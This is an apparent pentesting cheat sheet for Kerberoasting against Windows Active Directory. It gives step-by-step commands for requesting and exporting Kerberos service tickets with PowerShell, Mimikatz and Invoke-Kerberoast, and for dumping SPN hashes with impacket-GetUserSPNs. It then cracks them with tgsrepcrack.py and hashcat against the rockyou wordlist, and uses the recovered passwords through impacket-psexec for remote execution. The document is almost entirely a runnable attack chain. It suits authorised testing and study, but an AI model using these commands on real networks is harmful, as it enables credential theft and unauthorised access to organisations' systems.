Kerberoasting

Crack the Kerberos service ticket to obtain the clear text password for the service account. The service ticket is encrypted using the SPN’s password hash.

No administrative privileges required.

• Kerberoast
• Kerberos
• Kerberos cheatsheet (GitHub)

Install the kerberoast package on Kali

sudo apt update && sudo apt install kerberoast

Manually

On Windows, open a command prompt. Request the service ticket and export it.

powershell

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SPN>'

klist

Download the service ticket with Mimikatz.

mimikatz.exe "kerberos::list /export" exit

Or (not tested)

/usr/share/powershell-empire/empire/server/data/module_source/credentials/Invoke-Kerberoast.ps1

powershell
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat

Using Invoke-Kerberoast

Get SPNs

On Kali

impacket-GetUserSPNs ${DOMAIN}/${USER} -outputfile SPNs.txt

💡 Seen in a demo.

-request: Requests TGS for users and output them in JtR/hashcat format (default False)

impacket-GetUserSPNs -request ${DOMAIN}/${USER} > kerberoasting.txt

On Windows

cd impacket-master/examples
python3 GetUserSPNs <domain>/<username> -outputfile SPNs.txt

Extract ticket for a specific SPN

grep -i <spn> SPNs.txt > <spn>.kirby

Crack the tickets

Run tgsrepcrack.py, supplying a wordlist and the downloaded service ticket to crack the password.

WL=/home/kali/wl.txt
TICKET_FILE=<filename>.kirbi
python3 /usr/share/kerberoast/tgsrepcrack.py $WL $TICKET_FILE

Using Hashcat

HASH=<ticket>.kirby
TYPE=13100
WL=/usr/share/wordlists/rockyou.txt

hashcat -O -m $TYPE -a 0 $HASH $WL

Hash format:

$krb5tgs$23$*<USER>$<DOMAIN>$<SPN>*$TICKET

When tickets are cracked, try Impacket. To find user name, see hash format above or list all domain users (net user /domain).

impacket-psexec ${DOMAIN}/${USER}:${PASS}@${IP}